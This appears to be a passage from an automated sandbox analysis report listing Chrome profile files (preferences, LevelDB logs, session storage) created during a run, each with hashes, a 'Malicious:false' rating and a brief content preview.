                                                                                                                                                                SSDEEP:3:iNlljq7A/mhWJFuQ30VkWUMC/+/dwenqFtjE9SFcTpL0WWZ3V9RUIuqCn:d7/VkF/+/d4FS99pLTolTCn
                                                                                                                                                                MD5:4F5532A4CE61AA94CE61DEC33185604B
                                                                                                                                                                SHA1:3BF3DD8E4A5B889AF75FDE6ACDA54779275CDD69
                                                                                                                                                                SHA-256:0A66B63031E8F13DBFCE5841E37BD84B9752F05D4DD8C0BB48B80BE4F85F702B
                                                                                                                                                                SHA-512:9812224166897580708AF3D438DA024FFEB27BDD0EFC09FB443514BCF7A5ABF73B43EC797281C96EE0AC248550381CB17CFBDC0F13A6214962C6FF3F3763672E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .............dO'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:DOS executable (COM)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1915
                                                                                                                                                                Entropy (8bit):5.529709558582304
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:3/AK84tRVB7wYmVBHbgGrFefbVbXsGbj1ziAsbtwVbtEr4tMjDj1fzBjQfPBOVBh:3tpIDYGJ8gLidUbQfoiT2GK
                                                                                                                                                                MD5:AC56BDE3BFDE0308CAE85E90F85192F9
                                                                                                                                                                SHA1:91C846E2081CC6A586321701A143458015E0F5E6
                                                                                                                                                                SHA-256:7F229A533E1E1A835EE5B356C92E8C7432D285618C9BE7397890090CC26F02C5
                                                                                                                                                                SHA-512:184D885A17F302621EBEB4EA1F38A14339331E4C0004BD9233DA8B1AB6277526950F7D4F3BC90455406AA11D73F537F20BAF3E5F7A6303BB702BE666F82CA759
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .K..t................VERSION.1.8META:chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm............Q_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.CloudProvider7.{"cloudEnabled":false,"notifiedHangoutsPrivacy":false}.S_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.IdentityService6.{"signedIn":false,"userEmail":null,"kioskAuth":false}.Y_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.HangoutSinkDiscoveryService;.{"cache":{"sinks":{},"g":{},"h":null},"manualHangouts":{}}.H_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.LogManager...["[2021-08-16 19:11:58.08][INFO][mr.Init] MR instance ID: 8762dce2-debf-418a-adaa-647ac7c3b72d\n","[2021-08-16 19:11:58.08][INFO][mr.Init] Native Cast MRP is enabled.\n","[2021-08-16 19:11:58.08][INFO][mr.Init] Native Mirroring Service is enabled.\n","[2021-08-16 19:11:58.08][INFO][mr.PersistentDataManager] initialize: 0 chars used, 0 other chars\n","[2021-08-16 19:11:58.08][INFO][mr.Cloud
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):336
                                                                                                                                                                Entropy (8bit):5.124326389331365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oipQL+q2PlLN23iKKdK8a2jMGIFUtpvoDGKWZmwPvo9QLVkwOlLN23iKKdK8as:wipQ+vy5Kk8EFUtpgDGKW/Pg9QV5L5KV
                                                                                                                                                                MD5:8078D89334951C7E58008BC0CB53E04D
                                                                                                                                                                SHA1:0E4A094DDE19EEE1AD2E8994D3993FB5DB0B3B0C
                                                                                                                                                                SHA-256:3D17A93404F91549B6F071851CC9375F10174BCFE31843A497C9A043841E6D79
                                                                                                                                                                SHA-512:E7FB71ABB935CE2D4332AF9E6DE30A8CC7B8947AE5FA1B380BF1AEFDD97EFB5991ACB22B8CCE7E46017F053FEC6928793C625BC004929C8D41B6F604F3CF33D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.555 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:10:31.556 1eec Recovering log #3.2021/08/16-19:10:31.558 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):336
                                                                                                                                                                Entropy (8bit):5.124326389331365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oipQL+q2PlLN23iKKdK8a2jMGIFUtpvoDGKWZmwPvo9QLVkwOlLN23iKKdK8as:wipQ+vy5Kk8EFUtpgDGKW/Pg9QV5L5KV
                                                                                                                                                                MD5:8078D89334951C7E58008BC0CB53E04D
                                                                                                                                                                SHA1:0E4A094DDE19EEE1AD2E8994D3993FB5DB0B3B0C
                                                                                                                                                                SHA-256:3D17A93404F91549B6F071851CC9375F10174BCFE31843A497C9A043841E6D79
                                                                                                                                                                SHA-512:E7FB71ABB935CE2D4332AF9E6DE30A8CC7B8947AE5FA1B380BF1AEFDD97EFB5991ACB22B8CCE7E46017F053FEC6928793C625BC004929C8D41B6F604F3CF33D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.555 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:10:31.556 1eec Recovering log #3.2021/08/16-19:10:31.558 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                Entropy (8bit):0.7766145155282294
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:2a3WBA+IIYICVEq8MX0D0HSFlNUK6lGNxGt7KLk8s8LKvUf9KVyJ7hU:Z2FCn8MZyFlulGNxGt7KLyeymw
                                                                                                                                                                MD5:5BA75311B1B0D6276E298ECCD12B8B07
                                                                                                                                                                SHA1:AD9ABB15695F177530511DFD188EB8C33B8F7929
                                                                                                                                                                SHA-256:AEB7F25D09A00715C768CB87BA66EE544830347F998CCF218DE5C2072C4AAF3E
                                                                                                                                                                SHA-512:B60C61AA8F0448365E90B8076A04BBCF945A289E4B851648925B53F9340B89C97553B28D63753A91E53AD64D34C19DB294913DB159A934DF9B5AFCBF951E0617
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent StateM (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3343
                                                                                                                                                                Entropy (8bit):4.945222848960228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YXsVVMHzzsmdAMHtKsyfDszmcQ/RLsOcXSsM1PzshVMH8sp1AAMHDysKGMHTFsB5:PGqGctrmKwGPTGD7GSGMphH
                                                                                                                                                                MD5:CAB8BEABE7E66A4015C98A3C77B3698B
                                                                                                                                                                SHA1:C960AAAEA7014E105290C7D0F09BFCA837C8E8CC
                                                                                                                                                                SHA-256:75431010BFE77818B8BEF4B0C4B328C00668DC6B13C09AAB769EBF58BDA4EDF7
                                                                                                                                                                SHA-512:0D1E94E84294AEA4BF400FF9D0654748BFFEB92D3A1643A6A13B541ADB1BC13EA2F649560A27C8CC3D8AEF9DA5D6B668C7E3BE696091CE882A475B91A9A4CAC8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230891381309","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230891381310","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39697},"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230887958662","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230887958664","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":52163},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13270230886326794","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13270230886326795","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://clients2.google.com","supports_spdy
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent Stateom (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1692
                                                                                                                                                                Entropy (8bit):4.946447236044282
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Y2TtwDHXPqn3zsOUZADs3LRLshVyvTYhbD:JTODHXin1qAQy+0hH
                                                                                                                                                                MD5:B3BCC192F8F6CA097CF62E784CE4C9E9
                                                                                                                                                                SHA1:D6961E9301B6CDF23543DF70E4841CF971504E09
                                                                                                                                                                SHA-256:2F5F9570050AB1BFE1CF856270FFCDD24B233BA1905A0BFCB7D9860388917C78
                                                                                                                                                                SHA-512:999C125EC277BD8B8DB25FDCCACDD4D7C7E6B562AE5C6600EA837D2E4B5D8FB7BF99D7CFA1E70C87663DA126B6C714F98A8E7990AA54E0580AE152ED5DC3846D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://update.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13276231834467595","port":443,"protocol_str":"quic"},{"advertised_alpns":["h3-Q050"],"expiration":"13276231834467598","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3-29"],"expiration":"13276231834469104","port":443,"protocol_str":"quic"},{"advertised_alpns"
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4794
                                                                                                                                                                Entropy (8bit):5.24749425498766
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:nvAdIllnHa8KIN1aRWMoiVmdexVrMVXAiZw4:nodWHa8MWMBVq
                                                                                                                                                                MD5:E20011D796B928DF928BD3C7188DCB63
                                                                                                                                                                SHA1:39056EACA6FAF710C7D003EFF9194DCA6FAC1CE9
                                                                                                                                                                SHA-256:F676A94A4FB5231B8FE53D570DE9BB09F6F1C49E96EC271F731B085E3F74E95B
                                                                                                                                                                SHA-512:E8A124AE0243B1969A976D14B90D33F87B83A18111A3E8655435D57AC9AB18D1EF97483AE950258C8E8FC64ED39D804F5A3CC2DA659BF13D26462E926AEF52D8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"49601082":1,"50464499":1,"5151071":1,"54845618":5}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"install_signature":{"expire_date":"2021-11-08","ids":["pkedcjkdefgpdelpbcmbmeomcjbeemfm"],"invalid_ids":[],"salt":"P/VqSXKpUCSngasss21FVFHriEg3LI9c8GPtJCELXkM=","s
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences\ (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4108
                                                                                                                                                                Entropy (8bit):5.00328268195565
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlprAGqKlQKHoTw0pB/Pw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGLrVrqooH:n8AdKINuaRWMoiVmde+VrMVXAiZw4
                                                                                                                                                                MD5:49339D264E2E6524CFC8EAE54EDB1EA8
                                                                                                                                                                SHA1:E7E959B1BB7CEF10FB229BA0F05560717CA4D320
                                                                                                                                                                SHA-256:AF4975729DF354F89A9CDA8AA980C2CE90932A6779DC14E089A820302F35701B
                                                                                                                                                                SHA-512:DCA04B386076322564034343E94B5C09BEA636DEBE72392654EE5ABF214EB51BA5693F3AC15EB682602B04A03C312A72B319CD24E988EAB96D03F3819D19F2B1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"5151071":1}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gcm":{"product_category_for_
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences\* (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3488
                                                                                                                                                                Entropy (8bit):4.950593325875801
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcsvlSrAN4qwoTw0pB/nw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGgrtqoonVuzip:n50nNmaRWMoiVmdeVtMVuzip
                                                                                                                                                                MD5:045C0EBF4C833D8A4A9EAA9723D5EB02
                                                                                                                                                                SHA1:EF28657CEFCE81216DFF3F608CD6310C4E6AC757
                                                                                                                                                                SHA-256:9B69787E9926249202EA2E9132E15FC8EBC39E4557F5AB3B753987413C050126
                                                                                                                                                                SHA-512:782CE44E864A54C38119AF18C3C297BF6458F69BCEBB1C638E39A7EE3C241E68DE16E6DEE5DB5C869296A4A6FF28A68D35FF1219653468B6130D9F0D51D046A6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gcm":{"product_category_for_subtypes":"com.chrome.windows"},"google":{"services":{"signin_scoped_device_id":"b94e6f13-7987-48dc-98f4-d60c75c3dbd7"}},"intl":{"selected_languages":"en-US,en"},"invalidation":{"per_sender_topics_to_handler":{"1013309121859":{},"8181035976":{}}},"media":{"device_id_salt":"099511625CE63697AD937561012FD491","engagement":{"schema_version":4}},
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferencesex (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3488
                                                                                                                                                                Entropy (8bit):4.950763973648408
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcsvlSrAN4qwoTw0pB/nw8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGgrtqoonVuAip:n50nNmaRWMoiVmdeVtMVuAip
                                                                                                                                                                MD5:9C92AB8E1E9E924BD362FFBAD4C4B312
                                                                                                                                                                SHA1:F860816E33FA0B1ADCFBFADCED9D493721C41FC8
                                                                                                                                                                SHA-256:5C79045F01894515A73F7842ADC44028C12F5956D85F00375E99BDDB9103394E
                                                                                                                                                                SHA-512:2BFBA06032032232BFA80F316489E917A3F77CF95FD16755CF7B08D586F03026EA78F83B23C49EC024E50581BB5604F1AF474F21F57637AA0C08347F97AF0042
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gcm":{"product_category_for_subtypes":"com.chrome.windows"},"google":{"services":{"signin_scoped_device_id":"b94e6f13-7987-48dc-98f4-d60c75c3dbd7"}},"intl":{"selected_languages":"en-US,en"},"invalidation":{"per_sender_topics_to_handler":{"1013309121859":{},"8181035976":{}}},"media":{"device_id_salt":"099511625CE63697AD937561012FD491","engagement":{"schema_version":4}},
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferencesn (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4198
                                                                                                                                                                Entropy (8bit):5.014393042635659
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:YcBcvlVvErAGqKlQKHoTw0pB/Ew8cO1TSUQ/9BhUIEyMoI3HmeSye7peVGqrVrqH:nzAdKIN1aRWMoiVmdexVrMVXAiZw4
                                                                                                                                                                MD5:C8BA2271CEAEEC958D05A61C0FA6A46B
                                                                                                                                                                SHA1:408388C34517EBF2D5CE3CDEB054C23371FF5B07
                                                                                                                                                                SHA-256:73DE4038741F2EBE8491226278D905927D497ED6AAF652EBDD7BF0DF1995EC2B
                                                                                                                                                                SHA-512:B9F9D278CCBFC20B4C25EBA5526E44DB3F5489E6D12995FC1F8EF497F51426B9C283F3C4E8F1622EB66C03D73E2B89D4789F66416BC25F9F5D13923645E3EC9D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13273639830735874","alternate_error_pages":{"backup":true},"autocomplete":{"retention_policy_last_version":92},"autofill":{"orphan_rows_removed":true},"browser":{"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"this_week_number":2693,"this_week_services_downstream_foreground_kb":{"115188287":27,"125522256":1,"21145003":1051,"35565745":1,"49601082":1,"5151071":1,"54845618":5}},"default_apps_install_state":2,"domain_diversity":{"last_reporting_timestamp":"13273639830733889"},"download":{"directory_upgrade":true},"extensions":{"alerts":{"initialized":true},"chrome_url_overrides":{},"last_chrome_version":"92.0.4515.107"},"gaia_cookie":{"changed_time":1629166234.486642,"hash":"2jmj7l5rSw0yVb/vlWAYkK/YBwk=","last_list_accounts_data":"[\"gaia.l.a.r\",[]]"},"gc
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):21102
                                                                                                                                                                Entropy (8bit):5.533022210199644
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OiztQLl7XQ1kXqKf/pUZNCgVLH2HfEarULdHGGnHfn/m4i:GLljQ1kXqKf/pUZNCgVLH2HftrULBGGU
                                                                                                                                                                MD5:CD448B36767EC023BF56DCE73376DD16
                                                                                                                                                                SHA1:0950071C9DE6436367092331F145B2BB707877D0
                                                                                                                                                                SHA-256:3CEE50ACE3665FA5BECCE1C891574F7F4E71F95B15A12251CB308F6ACE1D9A85
                                                                                                                                                                SHA-512:CAE08E011274ED298F377BB8CA117158EF2422EA646C471551C0587404A67AFC756C4385A10C64A8C6A99B47C1A6CFEA624E47EAA2089B81F28AE19A0E60049D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences00 (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15154
                                                                                                                                                                Entropy (8bit):5.580392987991728
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:OUptaLl7Xl1kXqKf/pUZNCgVLH2HfEKrU5m+m4k:4Lljl1kXqKf/pUZNCgVLH2HfzrU5XmL
                                                                                                                                                                MD5:5AF9337C8C8CC0DC77EDB919BCDA0BA9
                                                                                                                                                                SHA1:FBF5E771847BB6217EF8679568D354642FD04B08
                                                                                                                                                                SHA-256:6B43675406FF7B40A8CCAF2D98807BF2974268A7444511C902BE9289F7ADF1B3
                                                                                                                                                                SHA-512:5DFFA7577A3EBB8ADFE37C71A25E5AF7ACC2CC225FAE67BCD82F0DCF5972CB974E5FFDAE143A91747428A8E68C148FA50B65B26DF147F4D8D9B0B93F0A46F966
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13273639830106535","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):2.5384726236607107
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:S85aEFljljljljljljljljljljljljljljl:S+a8ljljljljljljljljljljljljljlZ
                                                                                                                                                                MD5:A66EFAA590A0D16B1874A35836BA0A4B
                                                                                                                                                                SHA1:BB750C61E162420271F89A90F2B58F43587680E1
                                                                                                                                                                SHA-256:B9AB1ED7609E2254B7D4FB655B57B21B2BE601646C4FF0B207C411E8BDD9E654
                                                                                                                                                                SHA-512:2B1EA0C798B69B360AB1546D14FCCF7D5F9CB224B31BC8430CDB956C8CC570A086E4CFA10E6A843292DEB862F4161DFC9B9ABBC44AFE397FF0EC9563646FF7A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: *...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.145831994138907
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oCq2PlLN23iKKdKrQMxIFUtpvonVXZmwPvoZ47kwOlLN23iKKdKrQMFLJ:wCvy5KkCFUtpgVX/PgK5L5KktJ
                                                                                                                                                                MD5:0C18540842503F807DF96FB2275A9AFE
                                                                                                                                                                SHA1:67286C038A87EF157F5CDAEF7C08512EA3B9B6FE
                                                                                                                                                                SHA-256:43D6C924F74CE90589C7FDE3C12DB874906F2AF8C839343B3A9B835B41750CB2
                                                                                                                                                                SHA-512:B958DB49FCC2B6385D7663A5B9F90A455FC67E3B2FFC5D6ABFC91257405BAA031769B4E751C46634CCB75E7A4F54DAD937D018513A38FDAEE4866A93904C6439
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.557 1e80 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/08/16-19:10:31.564 1e80 Recovering log #3.2021/08/16-19:10:31.565 1e80 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .
